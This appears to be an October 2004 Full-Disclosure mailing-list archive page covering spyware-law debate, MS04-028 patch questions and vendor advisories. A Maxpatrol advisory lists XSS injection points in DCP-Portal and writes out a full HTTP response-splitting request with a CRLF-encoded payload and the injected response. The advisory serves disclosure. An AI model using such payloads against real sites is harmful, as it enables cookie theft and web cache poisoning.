|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: price.exe
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: Micheal Espinola Jr (michealespinola
gmail.com)
Date: Wed Oct 06 2004 - 09:31:08 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I don't see how this is a law against "hacking", when it is directed
at intentional misrepresentation and system modifications of an
unsuspecting end-users system.
If you want to be a hacking purist, spyware has nothing to do with "hacking".
Any laws at this point will help because it will give corporations
that are exposed to spyware the legal ground necessary to take fiscal
action against the people mass-producing spyware.
This should inadvertently help everyone else as well.
On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss
<ggillissnetpublishing.com> wrote:
> Great, Not that I'm any fan of spyware, but this is just another law
> against hacking. Think - what's the difference between this and someone
> using XSS to "take control" of a computer? If you r00t a box and deface
> the home page, then you've broken this law.
>
> <sigh> Instead of fixing the problem (poor software security) we pass
> laws to punish the people who do the things that illustrate the problem.
> Basic philosophical differences, blah blah blah ...
>
> Worst of all, do you really think that the spyware rackets will slow down
> or cease because of this? Nope - they'll just migrate out of the jurisdiction.
>
> -- Greg
>
>
>
> On or about 2004.10.06 06:03:18 +0000, RandallM (randallmfidmail.com) said:
>
> >
> >
> > The U.S. House of Representatives voted late Tuesday to restrict some of the
> > most deceptive forms of spyware.
> >
> > By a 399-1 vote, House members approved legislation prohibiting "taking
> > control" of a computer, surreptitiously modifying a Web browser's home page,
> > or disabling antivirus software without proper authorization.
> >
> > http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.h
> > tml?tag=nefd.top
> >
> >
> > thank you
> > Randall M
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> Gregory A. Gilliss, CISSP E-mail: greggilliss.com
> Computer Security WWW: http://www.gilliss.com/greg/
> PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
-Micheal
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Sans GDI scan says still vulnerable after patching
From: BillyBobKnob (billybobknobhotmail.com)
Date: Wed Oct 06 2004 - 10:15:52 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I have patched some systems at work with the MS04-028 patch and then ran the
Sans GDI scanner which said that they are still vulnerable.
Any ideas why ?
F:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.136 <-- Vulnerable version
F:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.136 <-- Vulnerable version
Thanks
Bill
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal
From: Alexander Antipov (antipovSecurityLab.ru)
Date: Wed Oct 06 2004 - 09:14:17 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in
DCP-Portal
Date: 28.09.2004
Severity: Low
Application: DCP-Portal, dcp-portal
Platform: PHP
I. DESCRIPTION
--------------
Multiple vulnerabilities were found in DCP-Portal. A remote user can
conduct cross-site scripting attacks and HTTP response splitting
attacks.
<p>
1. XSS in GET
/calendar.php?year=[XSS code here]&month=09&day=01
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here]
/news.php?nid=34&cid=[XSS code here]
/contents.php?cid=[XSS code here]
/index.php?cid=[XSS code here]
2. XSS in post
POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]
POST /search.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
PHPSESSID=1&q=XSS code here]&fields=1
POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scannerptsecurity.com&ad
dres
s=1&zip=1&city=1&country=[XSS code here]
3. HTTP response splitting
POST /calendar.php?show=full_month HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a
Cont
ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eSca
nned
%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1
Result
<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4
PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
<...>
II. IMPACT
----------
A remote user can access the target user's cookies (including
authentication cookies). A remote user may be able to poison any
intermediate web caches with arbitrary content.
III. SOLUTION
-------------
Not available currently.
IV. VENDOR FIX/RESPONSE
-----------------------
n/a
V. CREDIT
-------------
This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: Micheal Espinola Jr (michealespinolagmail.com)
Date: Wed Oct 06 2004 - 09:46:51 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Yes, clearly laws don't always work and people find loopholes. So
instead of making new ones to compensate, lets just stop.
Great idea. I'm surprised that the law enforcement community has not
come to this conclusion.
...And don't both discussing the appropriate changes to make to
existing flawed laws or the prevention of new inappropriate laws.
Lets just be negative, pass blame, and not be proactive about a
solution.
Are there any professionals on this list, or just people who like to
rant about policies and companies that they don't like?
"By a 399-1 vote, House members approved legislation prohibiting
"taking control" of a computer, surreptitiously modifying a Web
browser's home page, or disabling antivirus software without proper
authorization."
Yes, clearly this is a law against "hacking"... *sigh*
On Wed, 6 Oct 2004 08:07:38 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> Why make more computer laws...when the current computer laws can not be
> enforced correctl? We all know that the CAN-SPAM Act really cut the spam
> out of our e-mails *sigh* Then the INDUCE act will make half the stuff
> in a normal person's house illegal.
>
> Making laws is just playing around...paper on top of paper doesn't stop
> anything. It all falls back to the old saying - Action speaks louder
> than words.
>
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com
> > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> > Gregory Gilliss
> > Sent: Wednesday, October 06, 2004 7:04 AM
> > To: full-disclosurelists.netsys.com
> > Subject: Re: [Full-Disclosure] House approves spyware legislation
> >
> > Great, Not that I'm any fan of spyware, but this is just
> > another law against hacking. Think - what's the difference
> > between this and someone using XSS to "take control" of a
> > computer? If you r00t a box and deface the home page, then
> > you've broken this law.
> >
> > <sigh> Instead of fixing the problem (poor software security)
> > we pass laws to punish the people who do the things that
> > illustrate the problem.
> > Basic philosophical differences, blah blah blah ...
> >
> > Worst of all, do you really think that the spyware rackets
> > will slow down or cease because of this? Nope - they'll just
> > migrate out of the jurisdiction.
> >
> > -- Greg
> >
> > On or about 2004.10.06 06:03:18 +0000, RandallM
> > (randallmfidmail.com) said:
> >
> > >
> > >
> > > The U.S. House of Representatives voted late Tuesday to
> > restrict some
> > > of the most deceptive forms of spyware.
> > >
> > > By a 399-1 vote, House members approved legislation prohibiting
> > > "taking control" of a computer, surreptitiously modifying a Web
> > > browser's home page, or disabling antivirus software
> > without proper authorization.
> > >
> > >
> > http://news.com.com/House+approves+spyware+legislation/2100-1028_3-539
> > > 7822.h
> > > tml?tag=nefd.top
> > >
> > >
> > > thank you
> > > Randall M
> > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> > --
> > Gregory A. Gilliss, CISSP
> > E-mail: greggilliss.com
> > Computer Security WWW:
> > http://www.gilliss.com/greg/
> > PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83
> > D9 B4 14 0E 8C A3
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
-Micheal
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: [Full-Disclosure] Sans GDI scan says still vulnerable after patching
From: Todd Towles (toddtowlesbrookshires.com)
Date: Wed Oct 06 2004 - 10:47:26 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I suggest you search in the patchmanagment mailing list on
patchmanagement.org
Sorry to tell you, but the OS isn't the only thing that needs patching.
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> BillyBobKnob
> Sent: Wednesday, October 06, 2004 10:16 AM
> To: Full Disclosure
> Subject: [Full-Disclosure] Sans GDI scan says still
> vulnerable after patching
>
> I have patched some systems at work with the MS04-028 patch
> and then ran the Sans GDI scanner which said that they are
> still vulnerable.
> Any ideas why ?
>
> F:\WINDOWS\system32\dllcache\sxs.dll
>
> Version: 5.1.2600.136 <-- Vulnerable version
>
> F:\WINDOWS\system32\sxs.dll
>
> Version: 5.1.2600.136 <-- Vulnerable version
>
>
>
> Thanks
> Bill
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: [Full-Disclosure] Sans GDI scan says still vulnerable after patching
From: Alan Melia (Melmac) (alanmemelmac.co.uk)
Date: Wed Oct 06 2004 - 10:58:01 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
It looks like the Sans GDI scan does not take into account the PRE-SP1 fix
version...
http://www.microsoft.com/technet/security/bulletin/MS04-028.mspx
Windows XP Home Edition, Windows XP Professional, Windows XP Home Edition
Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC
Edition, and Windows XP Media Center Edition:
Date Time Version Size File name Folder
--------------------------------------------------------------------------
09-Mar-2004 01:58 5.1.2600.136 646,656 Sxs.dll SP1 (Pre SP1)
02-Mar-2004 21:19 5.1.3102.1360 1,638,400 Gdiplus.dll SP1 (Pre SP1)
09-Mar-2004 02:25 5.1.2600.1363 676,864 Sxs.dll SP2 (With
SP1)
02-Mar-2004 21:19 5.1.3102.1360 1,638,400 Gdiplus.dll SP2 (With
SP1)
Alan
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBobKnob
Sent: 06 October 2004 16:16
To: Full Disclosure
Subject: [Full-Disclosure] Sans GDI scan says still vulnerable after
patching
I have patched some systems at work with the MS04-028 patch and then ran the
Sans GDI scanner which said that they are still vulnerable.
Any ideas why ?
F:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.136 <-- Vulnerable version
F:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.136 <-- Vulnerable version
Thanks
Bill
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
SV: [Full-Disclosure] Sans GDI scan says still vulnerable after patching
From: Peter Kruse (krusekrusesecurity.dk)
Date: Wed Oct 06 2004 - 11:30:38 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi Billy,
Copy your updated gdiplus.dll file and overwrite the vulnerable DLL's.
Please note that this procedure might provent third part software from
working proberly.
>F:\WINDOWS\system32\dllcache\sxs.dll
See: http://support.microsoft.com/?kbid=236995
>F:\WINDOWS\system32\sxs.dll
This usally occurs when third part software is installed on the system.
Their DLL's might be based upon the vulnerable version from MS. You shold
make a backup of the vulnerable DLL's and overwite them with the new patched
version. If this doesn't give any problems, with any other software you've
installed, you can always delete the backup.
Regards
Peter Kruse
http://www.csis.dk
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: Mark Shirley (mshirleygmail.com)
Date: Wed Oct 06 2004 - 11:04:37 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Blah blah blah, it's about as useful as the war on drugs. Certin
drugs are illegal, it hasn't eliminated much, pirated software is
illegal, an old lady asked me for a copy of xp yesterday. You arn't
going to get it all. Most laws are nothing more then a basis for
prosecution. People still murder, but law puts them behind bars. Some
innocents will get hurt but war is hell right? This is a step in the
right direction and will provide clear grounds for prosecuting
criminals who are caught. Hopefully the ones who contribute the most
to the problem. Personally I don't see a single aspect of this law
that hurts hacking.
On Wed, 6 Oct 2004 10:46:51 -0400, Micheal Espinola Jr
<michealespinolagmail.com> wrote:
> Yes, clearly laws don't always work and people find loopholes. So
> instead of making new ones to compensate, lets just stop.
>
> Great idea. I'm surprised that the law enforcement community has not
> come to this conclusion.
>
> ...And don't both discussing the appropriate changes to make to
> existing flawed laws or the prevention of new inappropriate laws.
> Lets just be negative, pass blame, and not be proactive about a
> solution.
>
> Are there any professionals on this list, or just people who like to
> rant about policies and companies that they don't like?
>
> "By a 399-1 vote, House members approved legislation prohibiting
> "taking control" of a computer, surreptitiously modifying a Web
> browser's home page, or disabling antivirus software without proper
> authorization."
>
> Yes, clearly this is a law against "hacking"... *sigh*
>
> On Wed, 6 Oct 2004 08:07:38 -0500, Todd Towles
>
>
> <toddtowlesbrookshires.com> wrote:
> > Why make more computer laws...when the current computer laws can not be
> > enforced correctl? We all know that the CAN-SPAM Act really cut the spam
> > out of our e-mails *sigh* Then the INDUCE act will make half the stuff
> > in a normal person's house illegal.
> >
> > Making laws is just playing around...paper on top of paper doesn't stop
> > anything. It all falls back to the old saying - Action speaks louder
> > than words.
> >
> >
> >
> > > -----Original Message-----
> > > From: full-disclosure-adminlists.netsys.com
> > > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> > > Gregory Gilliss
> > > Sent: Wednesday, October 06, 2004 7:04 AM
> > > To: full-disclosurelists.netsys.com
> > > Subject: Re: [Full-Disclosure] House approves spyware legislation
> > >
> > > Great, Not that I'm any fan of spyware, but this is just
> > > another law against hacking. Think - what's the difference
> > > between this and someone using XSS to "take control" of a
> > > computer? If you r00t a box and deface the home page, then
> > > you've broken this law.
> > >
> > > <sigh> Instead of fixing the problem (poor software security)
> > > we pass laws to punish the people who do the things that
> > > illustrate the problem.
> > > Basic philosophical differences, blah blah blah ...
> > >
> > > Worst of all, do you really think that the spyware rackets
> > > will slow down or cease because of this? Nope - they'll just
> > > migrate out of the jurisdiction.
> > >
> > > -- Greg
> > >
> > > On or about 2004.10.06 06:03:18 +0000, RandallM
> > > (randallmfidmail.com) said:
> > >
> > > >
> > > >
> > > > The U.S. House of Representatives voted late Tuesday to
> > > restrict some
> > > > of the most deceptive forms of spyware.
> > > >
> > > > By a 399-1 vote, House members approved legislation prohibiting
> > > > "taking control" of a computer, surreptitiously modifying a Web
> > > > browser's home page, or disabling antivirus software
> > > without proper authorization.
> > > >
> > > >
> > > http://news.com.com/House+approves+spyware+legislation/2100-1028_3-539
> > > > 7822.h
> > > > tml?tag=nefd.top
> > > >
> > > >
> > > > thank you
> > > > Randall M
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > > --
> > > Gregory A. Gilliss, CISSP
> > > E-mail: greggilliss.com
> > > Computer Security WWW:
> > > http://www.gilliss.com/greg/
> > > PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83
> > > D9 B4 14 0E 8C A3
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
> --
> -Micheal
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] XML firewall
From: n30 (n30_listshotmail.com)
Date: Wed Oct 06 2004 - 11:19:16 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Any links / resources on XML firewall testing??
cheers!!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: James Tucker (jftuckergmail.com)
Date: Wed Oct 06 2004 - 10:53:36 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, 6 Oct 2004 08:07:38 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> Why make more computer laws...when the current computer laws can not be
> enforced correctl? We all know that the CAN-SPAM Act really cut the spam
> out of our e-mails *sigh*
There is clearly allot of computer related crime that cannot be
enforced, but this is not dissimilar from the physical crime that is
carried out all over the world undetected (fights, drugs, fraud,
(war?), you name it). The difference is scale (or is it really that
different? maybe not). When a physical law is broken and it has been
brought to the attention of the authorities they can prosecute because
the law exists. Many physical offences also go unnoticed as with the
digital world. If the laws don't exist in either world, then in both
the result is the same -> you can't prosecute. While this law may not
be a solution to the problem, it does mean that people can be
prosecuted when they are found. It is clear that it is significantly
easier to prove this law has been broken than it is to prove that an
offence has been committed under older laws. This also includes the
ability to target the developers as well as the middle men
(distributors).
> Then the INDUCE act will make half the stuff
> in a normal person's house illegal.
This should fall under "proper authorisation" and some companies may
need to make changes to their software licenses and install routines
in order to comply.
> Making laws is just playing around...paper on top of paper doesn't stop
> anything.
It does put a significant brake on those who are prosecuted as a
result of its existence.
> It all falls back to the old saying - Action speaks louder
> than words.
Any proposals as to how it could be done properly, without breaching
privacy laws?
Should we be requesting ISP's to deny all addresses which are housing
malware? could they ever afford to manage such a task? Should the
government subsidise security systems? Again, could they afford to?
What about the millions of ways around the protections, proxies,
tunnels, bouncers, undiscovered regions, de-centralised connection
mechanisms?
This is a multinational issue and it is very true that one country can
only regulate so much. The underlying infrastructure of the Internet
(in particular its protocols and connectedness) is built to withstand
outside influence (such as a connection orientated attack of the
malware) and to successfully provide communication even in 'bad'
scenarios, as a result it will always be subject to the ability for
people to 'hide under' and 'go around' most of the technological
challenges that are put in front of them, at very least in terms of
communications. This means it is hard to fight this battle from the
technology side unless you can impact a significant proportion of the
world (like making changes to the functionality of a common operating
system for example; but even this takes significant time to spread).
Given the above, I suppose all I can say is "every little helps".
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Dominos web access testing
From: n30 (n30_listshotmail.com)
Date: Wed Oct 06 2004 - 11:20:40 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Any links / pointers on dominos web access testing
Thanks
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
Valdis.Kletnieksvt.edu
Date: Wed Oct 06 2004 - 14:17:22 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, 06 Oct 2004 12:04:37 EDT, Mark Shirley said:
> criminals who are caught. Hopefully the ones who contribute the most
> to the problem. Personally I don't see a single aspect of this law
> that hurts hacking.
(Note - it's a "bill" until it passes both House and Senate and gets
signed by the President. *Then* it's a law)...
If you mean "old-school" hacking, the new bill is neutral. If you meant
"hacking" in the now-common meaning of "breaking into systems", then the
new bill is pointless - if it doesn't hurt breaking into systems, why pass it?
A previous poster made some very correct comments about updating laws to
match new circumstances. The big question here:
1) Does this bill actually fix a "corner case" where previously, the prohibited
behavior was clearly undesirable, but no law actually addressed the issue?
or
2) Is this bill merely a pre-election "feel good and generate PR" move (remember,
all 435 members of the house are up for re-election in a few weeks)?
Can anybody point at a *specific* case where the new bill changes the balance
of power? I haven't read the text yet - will it do nothing because everybody
who's likely to get caught is *already* breaking the laws already existent,
or should we be cheering "Hooray, now we can finally (arrest, file civil
actions against, etc) that Sleazeball XYZ who created/distributes Spyware Foo"?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFBZETCcC3lWbTT17ARAvBaAJ95exHBadjL6rcOOvcaYZiYWeG49gCcCBw4
D/Zi7JFwhx2Zm1ig/iLw51Q=
=NJWc
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: Gary E. Miller (gemrellim.com)
Date: Wed Oct 06 2004 - 14:10:43 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Yo All!
On Wed, 6 Oct 2004, RandallM wrote:
> The U.S. House of Representatives voted late Tuesday to restrict some of the
> most deceptive forms of spyware.
Oh great. If this gets signed into law then they just legalized all
spyware that has an EULA.
Think of all those free applets, clocks, calendars, tiny dancers, etc.
that have you agree to an EULA. Now all the spyware imbedded in them is
legally protected.
Just like the "(You) Can Spam Act". The worst abuses are made illegal,
with no real enforcement provisions, and the rest are legalized.
Score another one for the DMA.
RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
gemrellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQFBZEM28KZibdeR3qURApBiAJ9qXes0sMq9XKUyuIREIEsyTNh2rACbBf9a
ZGLW5sM6aaLCuXSSPXuIFZc=
=sMxM
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] MDKSA-2004:105 - Updated xine-lib packages fix multiple vulnerabilities
From: Mandrake Linux Security Team (securitylinux-mandrake.com)
Date: Wed Oct 06 2004 - 14:40:48 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandrakelinux Security Update Advisory
_______________________________________________________________________
Package name: xine-lib
Advisory ID: MDKSA-2004:105
Date: October 6th, 2004
Affected versions: 10.0
______________________________________________________________________
Problem Description:
A number of string overflows were discovered in the xine-lib program,
some of which can be used for remote buffer overflow exploits that
lead to the execution of arbitrary code with the permissions of the
user running a xine-lib-based media application. xine-lib versions
1-rc2 through, and including, 1-rc5 are vulnerable to these problems.
As well, a heap overflow was found in the DVD subpicture decoder of
xine-lib; this vulnerability is also remotely exploitable. All
versions of xine-lib prior to and including 0.5.2 through, and
including, 1-rc5 are vulnerable to this problem.
Patches from the xine-lib team have been backported and applied to
the program to solve these problems.
_______________________________________________________________________
References:
http://xinehq.de/index.php/security/XSA-2004-4
http://xinehq.de/index.php/security/XSA-2004-5
______________________________________________________________________
Updated Packages:
Mandrakelinux 10.0:
10ce6885addcfa3a9ed0380805fcbce6 10.0/RPMS/libxine1-1-0.rc3.6.2.100mdk.i586.rpm
2a1341dfa762f5208673ab20ec5d9092 10.0/RPMS/libxine1-devel-1-0.rc3.6.2.100mdk.i586.rpm
a654845136034c4cdb30ed89a0ca81b7 10.0/RPMS/xine-aa-1-0.rc3.6.2.100mdk.i586.rpm
e70b118d3bdd2a9a9dc48143601f78a4 10.0/RPMS/xine-arts-1-0.rc3.6.2.100mdk.i586.rpm
1ff7a30cd60c470f4d89cebfaf33d5f8 10.0/RPMS/xine-dxr3-1-0.rc3.6.2.100mdk.i586.rpm
2be55268cb20ff387313f662d19e5112 10.0/RPMS/xine-esd-1-0.rc3.6.2.100mdk.i586.rpm
8ea540e75311662ee5db57a0fa38e51a 10.0/RPMS/xine-flac-1-0.rc3.6.2.100mdk.i586.rpm
ba12f4c0368e6d81f6965c64e13796a0 10.0/RPMS/xine-gnomevfs-1-0.rc3.6.2.100mdk.i586.rpm
253a8c8dac5200fe7afc3d5d502be1ed 10.0/RPMS/xine-plugins-1-0.rc3.6.2.100mdk.i586.rpm
0f65783b02ceea2ee697af41a4406d76 10.0/SRPMS/xine-lib-1-0.rc3.6.2.100mdk.src.rpm
Mandrakelinux 10.0/AMD64:
12e4e1ef7a03cee73b025f106de3f05e amd64/10.0/RPMS/lib64xine1-1-0.rc3.6.2.100mdk.amd64.rpm
b04a4aa8e15009fe67e7cbd2b5d7304f amd64/10.0/RPMS/lib64xine1-devel-1-0.rc3.6.2.100mdk.amd64.rpm
dec9a4e10c6c1f3cda08a252bfa54963 amd64/10.0/RPMS/xine-aa-1-0.rc3.6.2.100mdk.amd64.rpm
76890b85ba9cc2ddd84bc8f7f79e1482 amd64/10.0/RPMS/xine-arts-1-0.rc3.6.2.100mdk.amd64.rpm
fbf465711eda60e57198666c0c693267 amd64/10.0/RPMS/xine-esd-1-0.rc3.6.2.100mdk.amd64.rpm
e5921bb72c4a819a685d736301643c4d amd64/10.0/RPMS/xine-flac-1-0.rc3.6.2.100mdk.amd64.rpm
c79055804621f8ff95ad738a75bcc5d6 amd64/10.0/RPMS/xine-gnomevfs-1-0.rc3.6.2.100mdk.amd64.rpm
72781a34d4b3f83d2e4a3e5226ed5942 amd64/10.0/RPMS/xine-plugins-1-0.rc3.6.2.100mdk.amd64.rpm
0f65783b02ceea2ee697af41a4406d76 amd64/10.0/SRPMS/xine-lib-1-0.rc3.6.2.100mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrakeUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandrakesoft for security. You can obtain
the GPG public key of the Mandrakelinux Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandrakelinux at:
http://www.mandrakesoft.com/security/advisories
If you want to report vulnerabilities, please contact
security_linux-mandrake.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
<security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFBZEpAmqjQ0CJFipgRAlxcAJwIKy+YgZjkGEM/FS6iG0WKnXmtGQCgs5vw
o1mdmtdIISSyK1vpnbFzBuo=
=sYnL
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Re: real spam from secure
microsoft.com ?
From: Georgi Guninski (guninskiguninski.com)
Date: Wed Oct 06 2004 - 15:17:56 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, Oct 06, 2004 at 02:26:37PM +0200, Feher Tamas wrote:
>
> The hare walks in the forest. There comes the wolf and the bear.
> They say let's beat up that rabbit.
by comparing nice creatures like rabbits with low level creatures like m$
you start yet another flame war.
we are ready for the war.
are you?
--
georgi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] iDEFENSE Security Advisory 10.06.04a: MySQL MaxDB Web Agent WebDBM Server Name Denial of Service Vulnerability
idlabs-advisoriesidefense.com
